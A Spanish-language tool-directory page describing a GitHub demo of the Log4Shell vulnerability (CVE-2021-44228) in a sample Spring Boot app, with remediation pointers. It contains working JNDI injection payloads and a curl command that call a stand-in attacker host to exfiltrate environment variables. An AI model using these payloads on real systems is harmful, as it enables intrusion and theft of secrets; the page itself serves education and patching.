Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
log4j-vulnerability — Log4Shell (CVE-2021-44228) es una vulnerabilidad de día cero en Log4j | Kitploit
Herramientas/GitHubGitHub/mazhar-hassan/log4j-vulnerability
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPruebas de PenetraciónAprendizaje y Educación
GitHubmazhar-hassan/log4j-vulnerability

log4j-vulnerability

Log4Shell (CVE-2021-44228) es una vulnerabilidad de día cero en Log4j

Ver Repositorio
hace 3 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Log4Shell (CVE-2021-44228) es una vulnerabilidad de día cero en Log4j

Vulnerabilidad Log4J

Descubierta: 24 de noviembre de 2021

Parcheada: 6 de diciembre de 2021

Demo del ataque

Haz clic abajo para ver el video en YouTube

ATTACK DEMO

Aplicación de ejemplo

Esta aplicación de ejemplo es una aplicación Spring Boot, usa log4j como marco de registro y se ejecuta con las siguientes variables de entorno en el puerto 8080 en localhost.

Mira la explicación en video:

https://youtu.be/bb6pgWrm7tA

Variables de entorno

key=jason.bourne;secret=Treadstone

Ataque

POST http://localhost:8080//v1/public/log-test

Parámetro:

value=${jndi:ldap://some-random-hacking-site.com}

Ataque desde el cliente

Obtener variables de entorno

Usando la siguiente cadena puedes obtener variables de entorno value=${jndi:ldap://some-random-hacking-site.com}/${env:key}/${env:secret}

Comando curl

curl -X POST -H 'Content-Type: application/x-www-form-urlencoded' -i http://localhost:8080/v1/public/log-test --data 'value=${jndi:ldap://some-random-hacking-site.com}/${env:key}/${env:secret}'

Consola de registro

2021-12-25 10:47:58,112 http-nio-8080-exec-1 WARN Error looking up JNDI resource [ldap://some-random-hacking-site.com]. javax.naming.CommunicationException: some-random-hacking-site:389 [Root exception is java.net.ConnectException: Connection timed out: connect] at com.sun.jndi.ldap.Connection.<init>(Connection.java:243) at com.sun.jndi.ldap.LdapClient.<init>(LdapClient.java:137) at com.sun.jndi.ldap.LdapClient.getInstance(LdapClient.java:1615)

Corrección

https://spring.io/blog/2021/12/10/log4j2-vulnerability-and-spring-boot

Confirmación

mvn dependency:tree Asegúrate de que ninguno de los JARs dependientes apunte a una versión vulnerable de log4j.

Lista de reproducción de seguridad de Techflix en YouTube

https://www.youtube.com/watch?v=bb6pgWrm7tA&list=PLLqjNYIgOqeQl6NaeIeUhvNcWdpOVNkRi&index=1

Descargar herramienta